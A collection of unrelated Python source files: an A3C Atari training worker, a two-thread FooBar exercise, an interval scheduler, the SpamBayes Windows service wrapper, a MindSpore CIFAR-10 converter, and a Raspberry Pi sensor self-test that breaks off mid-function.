                self.var_norms = tf.global_norm(local_vars)
                # Clip by global norm to stabilise asynchronous updates.
                grads,self.grad_norms = tf.clip_by_global_norm(self.gradients,40.0)

                #Apply local gradients to global network
                global_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'global')
                self.apply_grads = trainer.apply_gradients(zip(grads,global_vars))
class Worker():
    """A3C worker: owns one environment copy and a local AC_Network.

    Each worker repeatedly syncs its local network from the 'global' scope,
    collects experience, and applies gradients back to the global network.
    """
    def __init__(self,env,name,s_size,a_size,trainer,model_path,global_episodes):
        self.name = "worker_" + str(name)
        self.number = name
        self.model_path = model_path
        self.trainer = trainer
        self.global_episodes = global_episodes
        # Op that bumps the shared episode counter (run by worker_0 only).
        self.increment = self.global_episodes.assign_add(1)
        self.episode_rewards = []
        self.episode_lengths = []
        self.episode_mean_values = []
        # Start each run with a fresh TensorBoard log directory.
        if tf.gfile.Exists("/tmp/train_"+str(self.number)):
            tf.gfile.DeleteRecursively("/tmp/train_"+str(self.number))
        self.summary_writer = tf.summary.FileWriter("/tmp/train_"+str(self.number))

        #Create the local copy of the network and the tensorflow op to copy global paramters to local network
        self.local_AC = AC_Network(s_size,a_size,self.name,trainer)
        self.update_local_ops = update_target_graph('global',self.name)
        # Record videos for the first worker only.
        if self.name == 'worker_0':
            env = wrappers.Monitor(env, './frames', force=True)
        #End Doom set-up
        self.env = env

    def train(self,rollout,sess,gamma,lam,bootstrap_value):
        """Run one gradient update from a rollout.

        Returns per-step (value_loss, policy_loss, entropy) plus gradient
        and variable norms.  `bootstrap_value` is the value estimate used
        in place of the unknown return beyond the rollout.
        """
        rollout = np.array(rollout)
        observations = rollout[:,0]
        actions = rollout[:,1]
        rewards = rollout[:,2]
        next_observations = rollout[:,3]
        values = rollout[:,5]

        # Here we take the rewards and values from the rollout, and use them to
        # generate the advantage and discounted returns.
        # The advantage function uses "Generalized Advantage Estimation"
        self.rewards_plus = np.asarray(rewards.tolist() + [bootstrap_value])
        discounted_rewards = discount(self.rewards_plus,gamma)[:-1]
        self.value_plus = np.asarray(values.tolist() + [bootstrap_value])
        advantages = rewards + gamma * self.value_plus[1:] - self.value_plus[:-1]
        advantages = discount(advantages,lam)

        # Update the global network using gradients from loss
        # Generate network statistics to periodically save
        feed_dict = {self.local_AC.target_v:discounted_rewards,
            self.local_AC.inputs:np.vstack(observations),
            self.local_AC.actions:actions,
            self.local_AC.advantages:advantages,
            self.local_AC.state_in[0]:self.batch_rnn_state[0],
            self.local_AC.state_in[1]:self.batch_rnn_state[1]}
        # batch_rnn_state is carried across train() calls within an episode.
        v_l,p_l,e_l,g_n,v_n, self.batch_rnn_state,_ = sess.run([self.local_AC.value_loss,
            self.local_AC.policy_loss,
            self.local_AC.entropy,
            self.local_AC.grad_norms,
            self.local_AC.var_norms,
            self.local_AC.state_out,
            self.local_AC.apply_grads],
            feed_dict=feed_dict)
        return v_l / len(rollout),p_l / len(rollout),e_l / len(rollout), g_n,v_n

    def work(self,max_episode_length,gamma,lam,sess,coord,saver):
        """Main worker loop: interact, train every 10 steps, log summaries."""
        global GLOBAL_STEP
        episode_count = sess.run(self.global_episodes)
        total_steps = 0
        print ("Starting worker " + str(self.number))
        best_mean_episode_reward = -float('inf')
        with sess.as_default(), sess.graph.as_default():
            while not coord.should_stop():
                # Pull the latest global parameters into the local network.
                sess.run(self.update_local_ops)
                episode_buffer = []
                episode_values = []
                episode_reward = 0
                episode_step_count = 0
                d = False

                s = self.env.reset()
                s = process_frame(s)
                rnn_state = self.local_AC.state_init
                self.batch_rnn_state = rnn_state
                while not d:
                    GLOBAL_STEP += 1
                    #Take an action using probabilities from policy network output.
                    a_dist,v,rnn_state = sess.run([self.local_AC.policy,self.local_AC.value,self.local_AC.state_out],
                        feed_dict={self.local_AC.inputs:[s],
                        self.local_AC.state_in[0]:rnn_state[0],
                        self.local_AC.state_in[1]:rnn_state[1]})
                    # Sample an action, then recover its index.
                    a = np.random.choice(a_dist[0],p=a_dist[0])
                    a = np.argmax(a_dist == a)

                    s1, r, d, _ = self.env.step(a)
                    if d == False:
                        s1 = process_frame(s1)
                    else:
                        s1 = s

                    episode_buffer.append([s,a,r,s1,d,v[0,0]])
                    episode_values.append(v[0,0])

                    episode_reward += r
                    s = s1
                    total_steps += 1
                    episode_step_count += 1

                    # If the episode hasn't ended, but the experience buffer is full, then we
                    # make an update step using that experience rollout.
                    if len(episode_buffer) == 10 and d != True:
                        # Since we don't know what the true final return is, we "bootstrap" from our current
                        # value estimation.
                        v1 = sess.run(self.local_AC.value,
                            feed_dict={self.local_AC.inputs:[s],
                            self.local_AC.state_in[0]:rnn_state[0],
                            self.local_AC.state_in[1]:rnn_state[1]})[0,0]
                        v_l,p_l,e_l,g_n,v_n = self.train(episode_buffer,sess,gamma,lam,v1)
                        episode_buffer = []
                        sess.run(self.update_local_ops)
                    if d == True:
                        break

                self.episode_rewards.append(episode_reward)
                self.episode_lengths.append(episode_step_count)
                self.episode_mean_values.append(np.mean(episode_values))

                # Update the network using the episode buffer at the end of the episode.
                # Terminal state has a true return of 0, so no bootstrap.
                if len(episode_buffer) != 0:
                    v_l,p_l,e_l,g_n,v_n = self.train(episode_buffer,sess,gamma,lam,0.0)

                # Periodically save gifs of episodes, model parameters, and summary statistics.
                if episode_count % 5 == 0 and episode_count != 0:
                    if self.name == 'worker_0' and episode_count % 5 == 0:
                        print('\n episode: ', episode_count, 'global_step:', GLOBAL_STEP, 'mean episode reward: ', np.mean(self.episode_rewards[-5:]))
                        print('mean episode value: ', np.mean(self.episode_mean_values[-5:]))
                    if episode_count % 100 == 0 and self.name == 'worker_0':
                        saver.save(sess,self.model_path+'/model-'+str(episode_count)+'.cptk')
                        print ("Saved Model")

                    mean_reward = np.mean(self.episode_rewards[-5:])
                    if episode_count > 20 and best_mean_episode_reward < mean_reward:
                        best_mean_episode_reward = mean_reward
                    mean_length = np.mean(self.episode_lengths[-5:])
                    mean_value = np.mean(self.episode_mean_values[-5:])
                    summary = tf.Summary()
                    summary.value.add(tag='Perf/Reward', simple_value=float(mean_reward))
                    summary.value.add(tag='Perf/Best_Reward', simple_value=float(best_mean_episode_reward))
                    summary.value.add(tag='Perf/Length', simple_value=float(mean_length))
                    summary.value.add(tag='Perf/Value', simple_value=float(mean_value))
                    summary.value.add(tag='Losses/Value Loss', simple_value=float(v_l))
                    summary.value.add(tag='Losses/Policy Loss', simple_value=float(p_l))
                    summary.value.add(tag='Losses/Entropy', simple_value=float(e_l))
                    summary.value.add(tag='Losses/Grad Norm', simple_value=float(g_n))
                    summary.value.add(tag='Losses/Var Norm', simple_value=float(v_n))
                    self.summary_writer.add_summary(summary, GLOBAL_STEP)
                    self.summary_writer.flush()
                # Only worker_0 advances the shared episode counter.
                if self.name == 'worker_0':
                    sess.run(self.increment)
                if episode_count%1==0:
                    print('\r {} {}'.format(episode_count, episode_reward),end=' ')
                episode_count += 1
def get_env(task, seed):
    """Build, seed and wrap the Gym environment for `task`."""
    env = gym.make(task.env_id)

    # Seed every RNG source so runs are reproducible.
    tf.set_random_seed(seed)
    np.random.seed(seed)
    random.seed(seed)
    env.seed(seed)

    return wrap_deepmind(env)
# ----- Hyper-parameters and script entry point -----
max_episode_length = 300
gamma = .99 # discount rate for advantage estimation and reward discounting
lam = 0.97 # GAE discount factor
s_size = 7056 # Observations are greyscale frames of 84 * 84 * 1
a_size = 3 # Agent can move Left, Right, or Fire
load_model = False
model_path = './model'

# Get Atari games.
benchmark = gym.benchmark_spec('Atari40M')

# Change the index to select a different game.
task = benchmark.tasks[3]
seed = 0 # Use a seed of zero (you may want to randomize the seed!)

tf.reset_default_graph()

if not os.path.exists(model_path):
    os.makedirs(model_path)

# Probe the environment once for the real action-space size.
env = get_env(task, seed)
#s_size = np.prod(env.observation_space.shape)
a_size = env.action_space.n
env.close()

global_episodes = tf.Variable(0,dtype=tf.int32,name='global_episodes',trainable=False)
trainer = tf.train.AdamOptimizer(learning_rate=0.0001)
master_network = AC_Network(s_size,a_size,'global',None) # Generate global network
num_workers = min(multiprocessing.cpu_count(), 8) # Set workers to the number of available CPU threads
print('--------{} threads are used--------'.format(num_workers))
workers = []
# Create worker classes
for i in range(num_workers):
    env = get_env(task, seed)
    workers.append(Worker(env,i,s_size,a_size,trainer,model_path,global_episodes))
saver = tf.train.Saver(max_to_keep=5)

with tf.Session() as sess:
    coord = tf.train.Coordinator()
    if load_model == True:
        print ('Loading Model...')
        ckpt = tf.train.get_checkpoint_state(model_path)
        saver.restore(sess,ckpt.model_checkpoint_path)
    else:
        sess.run(tf.global_variables_initializer())

    # This is where the asynchronous magic happens.
    # Start the "work" process for each worker in a separate thread.
    worker_threads = []
    for worker in workers:
        # FIX: bind `worker` as a default argument.  The previous
        # `lambda: worker.work(...)` closed over the loop variable, so a
        # thread scheduled late could run the wrong (or last) worker.
        worker_work = lambda w=worker: w.work(max_episode_length,gamma,lam,sess,coord,saver)
        t = threading.Thread(target=(worker_work))
        t.start()
        sleep(0.5)
        worker_threads.append(t)
    coord.join(worker_threads)
main.py | """
The same instance of FooBar will be passed to two different threads.
Thread A will call foo() while thread B will call bar().
Modify the given program to output "foobar" n times.
Example 1:
Input: n = 1
Output: "foobar"
Explanation:
There are two threads being fired asynchronously.
One of them calls foo(), while the other calls bar(). "foobar" is being output 1 time.
Example 2:
Input: n = 2
Output: "foobarfoobar"
Explanation: "foobar" is being output 2 times.
"""
import threading
class FooBar:
    """Emit "foo" then "bar", n times, with foo()/bar() on two threads.

    Two locks act as a ping-pong baton: foo() may run only while
    foo_mutex is free, and releases bar_mutex to let bar() go (and
    vice versa).
    """

    def __init__(self, n: int):
        self.n = n
        self.foo_mutex = threading.Lock()
        self.bar_mutex = threading.Lock()
        self.buffer = ""
        # bar() must wait for foo() to go first, so its gate starts held.
        self.bar_mutex.acquire()

    def _emit(self, word, gate, handoff):
        # Append `word` n times, taking `gate` before each append and
        # releasing `handoff` afterwards to unblock the other thread.
        for _ in range(self.n):
            gate.acquire()
            self.buffer += word
            handoff.release()

    def foo(self):
        self._emit("foo", self.foo_mutex, self.bar_mutex)

    def bar(self):
        self._emit("bar", self.bar_mutex, self.foo_mutex)

    def __repr__(self) -> str:
        return self.buffer
def main():
    """Run the FooBar demo with n=5 and print the interleaved output."""
    fb = FooBar(5)
    workers = [threading.Thread(target=fb.foo),
               threading.Thread(target=fb.bar)]
    for t in workers:
        t.start()
    for t in workers:
        t.join()
    print(fb)


if __name__ == '__main__':
    main()
schedule.py | import time
import threading
class Schedule:
    """Run a callable repeatedly on a fixed-interval grid until stopped."""

    def __init__(self):
        # Polled by start(); stop() clears it to end the loop.
        self.loop = True

    def start(self, interval, func, wait=True):
        """Invoke `func` every `interval` seconds.

        Each invocation runs on a fresh thread; when `wait` is true the
        loop joins the thread before scheduling the next run.  Runs are
        aligned to a grid anchored at the time start() was called.
        """
        base_time = time.time()
        while self.loop:
            worker = threading.Thread(target=func)
            worker.start()
            if wait:
                worker.join()
            # Remaining time until the next grid point; a remainder of
            # exactly zero falls back to a full interval.
            delay = ((base_time - time.time()) % interval) or interval
            time.sleep(delay)

    def stop(self):
        """Ask start() to exit after its current sleep finishes."""
        self.loop = False
|
pop3proxy_service.py | # Run the sb_server as a WinNT service. Should work on Windows 2000
# and Windows XP.
#
# * Install as a service using "pop3proxy_service.py install"
# * Start the service (Use Control Panel etc, or
# "pop3proxy_service.py start". Check the event
# log should anything go wrong.
# * To debug the service: "pop3proxy_service.py debug"
# Service then runs in the command prompt, showing all
# print statements.
# * To remove the service: "pop3proxy_service.py remove"
# This module is part of the spambayes project, which is Copyright 2002-2007
# The Python Software Foundation and is covered by the Python Software
# Foundation license.
# Originally written by Mark Hammond.
import os
import sys
import logging
import servicemanager
# Best-effort breadcrumbs: record the working directory and script paths in
# the services event log to aid debugging.  Failures (e.g. not running under
# the service manager) are deliberately ignored.
try:
    servicemanager.LogInfoMsg(os.getcwd())
    servicemanager.LogInfoMsg(__file__)
    servicemanager.LogInfoMsg(sys.argv[0])
except:
    pass
class ServiceEventLogHandler(logging.Handler):
    """Dispatches logging events to the win32 services event log.

    Requires pywin32.
    """
    # Module stored as a class attribute so emit()/handleError() can reach
    # it via self.servicemanager.
    import servicemanager

    def emit(self, record):
        """Emit a record.

        If a formatter is specified, it is used to format the record.
        This record is then written to the win32 services event log,
        with the type set to the appropriate type based on the level.
        """
        try:
            servicemgr = self.servicemanager
            level = record.levelno
            msg = self.format(record)
            if level >= logging.ERROR:
                servicemgr.LogErrorMsg(msg)
            elif level >= logging.WARNING:
                servicemgr.LogWarningMsg(msg)
            elif level >= logging.INFO:
                servicemgr.LogInfoMsg(msg)
            elif level >= logging.DEBUG:
                # What should we do with this? It's very low-level
                # to be going into the log, but then it only gets
                # added if the logger's level is set low enough.
                # For now, nothing (absorb), and reconsider this
                # when we are actually using the logging module properly.
                pass
            else:
                # Really low; just absorb these for now.
                pass
        except:
            self.handleError(record)

    def handleError(self, record):
        """
        Handle errors which occur during an emit() call.

        sys.stderr goes nowhere for a service, so redirect the traceback
        into the event log, too.
        """
        # FIX: the original referenced a bare, undefined `raiseExceptions`
        # (it lives in the logging module) and passed the StringIO object
        # itself, rather than its contents, to LogErrorMsg.
        if logging.raiseExceptions:
            try:
                import cStringIO as StringIO
            except ImportError:
                import StringIO
            import traceback
            ei = sys.exc_info()
            buf = StringIO.StringIO()
            traceback.print_exception(ei[0], ei[1], ei[2], None, buf)
            self.servicemanager.LogErrorMsg(buf.getvalue())
            del ei
class ServiceEventLogHandlerWrapper(object):
    """Pretend that the ServiceEventLogHandler is a file-like object,
    so we can use it while we don't use the proper logging module."""
    def __init__(self, service_name, level=logging.INFO):
        self.log = ServiceEventLogHandler()
        self.name = service_name
        self.level = level
        self.data = ""  # text buffered until a newline arrives

    def write(self, data):
        """Buffer `data`; emit one log record per newline-terminated batch."""
        # This could use the higher-up stuff, but don't for now.
        # Buffer until newline.
        self.data += data
        if '\n' not in data:
            return
        # Skip blank lines.  FIX: also reset the buffer here - previously
        # the whitespace stayed buffered and was prepended to the next
        # real message.
        if not self.data.strip():
            self.data = ""
            return
        record = logging.LogRecord(self.name, self.level, "", "",
                                   self.data, None, None)
        self.log.emit(record)
        self.data = ""
# Messages from pop3proxy will go nowhere when executed as a service
# Try and detect that print will go nowhere and redirect.
# redirect output somewhere useful when running as a service.
import win32api
try:
    win32api.GetConsoleTitle()
except win32api.error:
    # No console - if we are running from Python sources,
    # redirect to win32traceutil, but if running from a binary
    # install, redirect to the services event log.
    # We used to redirect to log files (in the temp folder, in
    # the form SpamBayesService%d.log), but that is apparently
    # not necessarily a good place, so we moved to the official
    # location.
    # Want to move to logging module later, so for now, we
    # hack together a simple logging strategy.
    if hasattr(sys, "frozen"):
        sys.stdout = ServiceEventLogHandlerWrapper("pop3proxy")
        sys.stderr = ServiceEventLogHandlerWrapper("pop3proxy",
                                                   logging.ERROR)
    else:
        import win32traceutil

# If running from sources, patch up sys.path
if not hasattr(sys, "frozen"):
    # We are in the 'spambayes\win32' directory. We
    # need the parent on sys.path, so 'spambayes.spambayes' is a package,
    # and 'pop3proxy' is a module
    this_filename = __file__
    sb_dir = os.path.dirname(os.path.dirname(this_filename))
    sb_scripts_dir = os.path.join(sb_dir,"scripts")
    sys.path.insert(0, sb_dir)
    sys.path.insert(-1, sb_scripts_dir)
    # and change directory here, so sb_server uses the correct
    # config file etc
    # If the "SpamBayesData" directory that we create exists, change to
    # that, otherwise into the spambayes directory itself.
    if os.path.exists(os.path.join(sb_dir, "SpamBayesData")):
        os.chdir(os.path.join(sb_dir, "SpamBayesData"))
    else:
        os.chdir(sb_dir)

# Fix to handle problem if there is a zlib.dll in the SYSTEM32 directory.
# (The Python DLL directory must come before that in sys.path)
# This is a bit hackish, but shouldn't do any real harm.
# NOTE(review): only sys.path[:-1] is scanned, presumably so an entry
# already at the end is left alone - confirm before changing.
from win32com.shell import shell, shellcon
sys32path = shell.SHGetFolderPath(0, shellcon.CSIDL_SYSTEM, 0, 0)
for path in sys.path[:-1]:
    if path == sys32path:
        sys.path.remove(path)
        assert path not in sys.path, \
               "Please remove multiple copies of windows\system32 in path"
        sys.path.append(path) # put it at the *end*
del sys32path
del shell
del shellcon
del path
# Rest of the standard Python modules we use.
import traceback
import threading
import cStringIO
# The spambayes imports we need.
import sb_server
# The win32 specific modules.
import win32serviceutil, win32service
import pywintypes, win32con, winerror
from ntsecuritycon import *
class Service(win32serviceutil.ServiceFramework):
    """Windows service wrapper that runs the SpamBayes sb_server proxy
    on a worker thread and bridges SCM start/stop requests to it."""
    # The script name was changed to "sb_server" but I'll leave this as pop3proxy
    # otherwise people might accidentally run two proxies.
    _svc_name_ = "pop3proxy"
    _svc_display_name_ = "SpamBayes Service"
    _svc_deps_ = ['tcpip'] # We depend on the tcpip service.
    def __init__(self, args):
        win32serviceutil.ServiceFramework.__init__(self, args)
        # event_stopping: a stop was requested (or the worker died);
        # event_stopped: the worker thread has completely finished.
        self.event_stopped = threading.Event()
        self.event_stopping = threading.Event()
        self.thread = None
    def SvcStop(self):
        # SCM stop request: flag shutdown and ask sb_server to stop;
        # SvcDoRun's wait loop does the actual teardown and reporting.
        self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
        self.event_stopping.set()
        sb_server.stop()
    def SvcDoRun(self):
        # Main service entry point: prepare sb_server, run it on a worker
        # thread, then wait for the stopping event while keeping the SCM
        # informed of our shutdown progress.
        import servicemanager
        # Setup our state etc
        try:
            sb_server.prepare(can_stop=False)
        except sb_server.AlreadyRunningException:
            msg = "The SpamBayes proxy service could not be started, as "\
                  "another SpamBayes server is already running on this machine"
            servicemanager.LogErrorMsg(msg)
            errCode = winerror.ERROR_SERVICE_SPECIFIC_ERROR
            self.ReportServiceStatus(win32service.SERVICE_STOPPED,
                                     win32ExitCode=errCode, svcExitCode=1)
            return
        assert not sb_server.state.launchUI, "Service can't launch a UI"
        # Start the thread running the server.
        thread = threading.Thread(target=self.ServerThread)
        thread.start()
        # Write an event log record - in debug mode we will also
        # see this message printed.
        from spambayes.Options import optionsPathname
        # NOTE(review): win32api is not imported in the visible portion of
        # this file -- confirm it is imported above, else this is a NameError.
        extra = " as user '%s', using config file '%s'" \
                % (win32api.GetUserName(),
                   optionsPathname)
        servicemanager.LogMsg(
            servicemanager.EVENTLOG_INFORMATION_TYPE,
            servicemanager.PYS_SERVICE_STARTED,
            (self._svc_name_, extra)
            )
        try:
            # Thread running - wait for the stopping event.
            self.event_stopping.wait()
            # Either user requested stop, or thread done - wait for it
            # to actually stop, but reporting we are still alive.
            # Wait up to 60 seconds for shutdown before giving up and
            # exiting uncleanly - we wait for current proxy connections
            # to close, but you have to draw the line somewhere.
            for i in range(60):
                self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
                self.event_stopped.wait(1)
                if self.event_stopped.isSet():
                    break
                print "The service is still shutting down..."
            else:
                # eeek - we timed out - give up in disgust.
                print "The worker failed to stop - aborting it anyway"
        except KeyboardInterrupt:
            pass
        # Write another event log record with the session statistics.
        s = sb_server.state
        status = " after %d sessions (%d ham, %d spam, %d unsure)" % \
                 (s.totalSessions, s.numHams, s.numSpams, s.numUnsure)
        servicemanager.LogMsg(
            servicemanager.EVENTLOG_INFORMATION_TYPE,
            servicemanager.PYS_SERVICE_STOPPED,
            (self._svc_name_, status)
            )
    def ServerThread(self):
        # Worker thread body: run sb_server until it exits, and in all
        # cases signal both events so SvcDoRun can complete the shutdown.
        try:
            try:
                sb_server.start()
            except SystemExit:
                # user requested shutdown
                print "pop3proxy service shutting down due to user request"
            except:
                # Otherwise an error we should log.
                ob = cStringIO.StringIO()
                traceback.print_exc(file=ob)
                message = "The pop3proxy service failed with an " \
                          "unexpected error\r\n\r\n" + ob.getvalue()
                # print it too, so any other log we have gets it.
                print message
                # Log an error event to the event log.
                import servicemanager
                servicemanager.LogErrorMsg(message)
        finally:
            self.event_stopping.set()
            self.event_stopped.set()
if __name__=='__main__':
    if "install" in sys.argv:
        # Installing the service also creates a directory (if it does not
        # already exist) in which the data will be placed, unless an
        # existing configuration file can be found.
        from spambayes.Options import optionsPathname
        if not os.path.exists(optionsPathname):
            data_directory = os.path.join(os.path.dirname(sys.argv[0]),
                                          "..", "SpamBayesData")
            data_directory = os.path.abspath(data_directory)
            if not os.path.exists(data_directory):
                print "Creating data directory at", data_directory
                os.makedirs(data_directory)
    # Delegate install/remove/start/stop/debug handling to pywin32.
    win32serviceutil.HandleCommandLine(Service)
|
cifar10_to_mr.py | # Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Cifar10 convert tool for MindRecord.
"""
from importlib import import_module
import os
import numpy as np
from mindspore import log as logger
from .cifar10 import Cifar10
from ..common.exceptions import PathNotExistsError
from ..filewriter import FileWriter
from ..shardutils import check_filename, ExceptionThread, SUCCESS, FAILED
try:
cv2 = import_module("cv2")
except ModuleNotFoundError:
cv2 = None
__all__ = ['Cifar10ToMR']
class Cifar10ToMR:
    """
    A class to transform from cifar10 to MindRecord.

    Note:
        For details about Examples, please refer to `Converting the CIFAR-10 Dataset <https://
        www.mindspore.cn/tutorials/zh-CN/master/advanced/dataset/record.html#converting-the-cifar-10-dataset>`_.

    Args:
        source (str): The cifar10 directory to be transformed.
        destination (str): MindRecord file path to transform into, ensure that no file with the same name
            exists in the directory.

    Raises:
        ValueError: If source or destination is invalid.
    """

    def __init__(self, source, destination):
        check_filename(source)
        self.source = source

        # The source directory must contain both the training batches
        # (data_batch_*) and the test batch (test_batch).
        entries = os.listdir(self.source)
        has_train = any(name.startswith("data_batch_") for name in entries)
        has_test = any(name.startswith("test_batch") for name in entries)
        if not has_train:
            raise PathNotExistsError("data_batch_*")
        if not has_test:
            raise PathNotExistsError("test_batch")

        check_filename(destination)
        self.destination = destination
        self.writer = None

    def run(self, fields=None):
        """
        Execute transformation from cifar10 to MindRecord.

        Args:
            fields (list[str], optional): A list of index fields. Default: None.

        Returns:
            MSRStatus, SUCCESS or FAILED.
        """
        if fields and not isinstance(fields, list):
            raise ValueError("The parameter fields should be None or list")

        dataset = Cifar10(self.source, False)
        dataset.load_data()

        train_images = dataset.images
        logger.info("train images: {}".format(train_images.shape))
        train_labels = dataset.labels
        logger.info("train images label: {}".format(train_labels.shape))

        test_images = dataset.Test.images
        logger.info("test images: {}".format(test_images.shape))
        test_labels = dataset.Test.labels
        logger.info("test images label: {}".format(test_labels.shape))

        train_raw = _construct_raw_data(train_images, train_labels)
        test_raw = _construct_raw_data(test_images, test_labels)

        # Write the train and test splits into two separate MindRecord files.
        targets = ((self.destination, train_raw, "img_train"),
                   (self.destination + "_test", test_raw, "img_test"))
        for file_name, raw, desc in targets:
            if _generate_mindrecord(file_name, raw, fields, desc) != SUCCESS:
                return FAILED
        return SUCCESS

    def transform(self, fields=None):
        """
        Encapsulate the run function to exit normally.

        Args:
            fields (list[str], optional): A list of index fields. Default: None.

        Returns:
            MSRStatus, SUCCESS or FAILED.
        """
        # Run the conversion on a daemon thread so an exception raised
        # inside it can be captured and re-raised in the caller.
        worker = ExceptionThread(target=self.run, kwargs={'fields': fields})
        worker.daemon = True
        worker.start()
        worker.join()
        if worker.exitcode != 0:
            raise worker.exception
        return worker.res
def _construct_raw_data(images, labels):
    """
    Construct raw data from cifar10 data.

    Args:
        images (list): image list from cifar10.
        labels (list): label list from cifar10.

    Returns:
        list[dict], data dictionary constructed from cifar10.

    Raises:
        ModuleNotFoundError: If opencv-python (cv2) is not installed.
    """
    if not cv2:
        raise ModuleNotFoundError("opencv-python module not found, please use pip install it.")

    raw_data = []
    for i, img in enumerate(images):
        # Bug fix: np.int was deprecated in NumPy 1.20 and removed in 1.24;
        # the builtin int is the equivalent, supported conversion.
        label = int(labels[i][0])
        # Swap RGB -> BGR channel order before JPEG encoding (cv2 expects BGR).
        _, img = cv2.imencode(".jpeg", img[..., [2, 1, 0]])
        row_data = {"id": int(i),
                    "data": img.tobytes(),
                    "label": int(label)}
        raw_data.append(row_data)
    return raw_data
def _generate_mindrecord(file_name, raw_data, fields, schema_desc):
    """
    Generate MindRecord file from raw data.

    Args:
        file_name (str): File name of MindRecord File.
        raw_data (dict): dict of raw data.
        fields (list[str]): Fields would be set as index which
            could not belong to blob fields and type could not be 'array' or 'bytes'.
        schema_desc (str): String of schema description.

    Returns:
        MSRStatus, SUCCESS or FAILED.
    """
    # Fixed schema shared by the train and test files.
    record_schema = {
        "id": {"type": "int64"},
        "label": {"type": "int64"},
        "data": {"type": "bytes"},
    }
    logger.info("transformed MindRecord schema is: {}".format(record_schema))

    record_writer = FileWriter(file_name, 1)
    record_writer.add_schema(record_schema, schema_desc)
    if fields and isinstance(fields, list):
        record_writer.add_index(fields)
    record_writer.write_raw_data(raw_data)
    return record_writer.commit()
|
fulltest.py | from quickpi import *
import time
import RPi.GPIO as GPIO
import threading
import random
import os
def checkTest(value, name):
    """Report a single test result on stdout and the OLED; return [value, name]."""
    outcome = "passed" if value else "failed"
    message = "Test " + name + " " + outcome
    print(message)
    displayTextOled(message)
    return [value, name]
def getAverageLightLevel(waittime):
    """Sample the ADS1015 light channel for `waittime` seconds.

    Args:
        waittime (float): sampling window in seconds.

    Returns:
        float: mean reading over the window, or 0.0 if no sample was taken.
    """
    start = time.time()
    total = 0
    n = 0
    while time.time() - start < waittime:
        total = total + readADCADS1015(2, 1, True)
        n = n + 1
    # Bug fix: waittime <= 0 leaves n == 0 and the original divided by zero.
    if n == 0:
        return 0.0
    return total / n
def getAverageSoundLevel(waittime):
    """Sample the microphone level for `waittime` seconds.

    Args:
        waittime (float): sampling window in seconds.

    Returns:
        float: mean sound level over the window, or 0.0 if no sample was taken.
    """
    start = time.time()
    total = 0
    n = 0
    while time.time() - start < waittime:
        total = total + readSoundLevel(1)
        n = n + 1
    # Bug fix: waittime <= 0 leaves n == 0 and the original divided by zero.
    if n == 0:
        return 0.0
    return total / n
def getIrReceiver(waittime, expected):
    """Poll the IR receiver on pin 23 for `waittime` seconds.

    Returns True only if the pin reads `expected` for the entire window.
    """
    deadline = time.time() + waittime
    while time.time() < deadline:
        if buttonStateInPort(23) != expected:
            return False
    return True
# i2c addresses expected on a healthy board (0x3c is the OLED; the other
# devices are presumably the accel/mag/ToF/ADC/IMU -- confirm against schematic).
expected_i2c = [0x1d, 0x1e, 0x29,0x3c, 0x48, 0x68]

def listi2cDevices():
    """Scan i2c bus 1 and return the list of addresses that answer a read."""
    # Drive the OLED reset pin high first so the screen shows up on the bus.
    RESET=21
    GPIO.setmode(GPIO.BCM)
    GPIO.setup(RESET, GPIO.OUT)
    time.sleep(0.01)
    GPIO.output(RESET, 1)

    found = []
    for address in range(128):
        handle = pi.i2c_open(1, address)
        try:
            pi.i2c_read_byte(handle)
        except:
            # No device at this address (pigpio raises on read failure).
            pass
        else:
            found.append(address)
        pi.i2c_close(handle)
    return found
def testI2cDevices():
    """True iff exactly the expected set of i2c devices is present."""
    global expected_i2c
    present = listi2cDevices()
    return present == expected_i2c
def testDistanceVL53l0x(up):
    # Test the VL53L0X time-of-flight distance sensor.
    # up=True: wait (forever, if need be) until the sensor returns 819.0 --
    #   presumably its out-of-range reading when nothing is in front of it;
    #   TODO confirm the sentinel against the driver.
    # up=False (board face down): for 0.5 s the reading must stay small.
    print("Testing distance sensor VL53l0x")
    start = time.time()
    if up:
        displayTextOled("Unobstruct distance sensor")
        while True:
            distance = readDistanceVL53(0)
            if distance == 819.0:
                return True
    else:
        while time.time() - start < 0.5:
            distance = readDistanceVL53(0)
            if distance > 13:
                # NOTE(review): message says "> 130" but the test is > 13 --
                # one of the two is likely wrong; confirm the sensor units.
                print("Distance > 130", distance)
                return False
        return True
def testAccelerometerBMI160():
    """Check the BMI160 accelerometer: with the board at rest the summed
    axis reading should stay within the [0.8, 1.2] g band for 0.5 s.

    Returns:
        bool: True if the reading stayed in band, False otherwise.
    """
    print("Testing accelerometer BMI160")
    start = time.time()
    while time.time() - start < 0.5:
        accel = readAccelBMI160()
        # NOTE(review): plain sum of axes, not the vector magnitude; it
        # mirrors the LSM303C test, so left as-is.
        force = accel[0] + accel[1] + accel[2]
        # Bug fix: the original condition used `and`
        # (force < 0.8 and force > 1.2), which can never be true.
        # The intent is "reading fell outside the band".
        if force < 0.8 or force > 1.2:
            return False
    return True
def testAccelerometerLSM303C():
    """Check the LSM303C accelerometer: with the board at rest the summed
    axis reading should stay within the [0.8, 1.2] g band for 0.5 s.

    Returns:
        bool: True if the reading stayed in band, False otherwise.
    """
    print("Testing accelerometer LSM303C")
    start = time.time()
    while time.time() - start < 0.5:
        # NOTE(review): `reaAccelerometerLSM303C` looks misspelled but is
        # presumably the actual quickpi API name -- confirm before renaming.
        accel = reaAccelerometerLSM303C()
        force = accel[0] + accel[1] + accel[2]
        # Bug fix: the original condition used `and`
        # (force < 0.8 and force > 1.2), which can never be true.
        # The intent is "reading fell outside the band".
        if force < 0.8 or force > 1.2:
            return False
    return True
def testLeds():
    """Blink each LED and verify the light sensor sees a brightness delta."""
    print("Blinking Leds")
    for pin in (27, 4, 17):
        print("Blinking led in " + str(pin))
        deadline = time.time() + 0.6
        while time.time() < deadline:
            changeLedState(pin, 1)
            time.sleep(0.1)
            level_on = getAverageLightLevel(0.1)
            changeLedState(pin, 0)
            time.sleep(0.1)
            level_off = getAverageLightLevel(0.1)
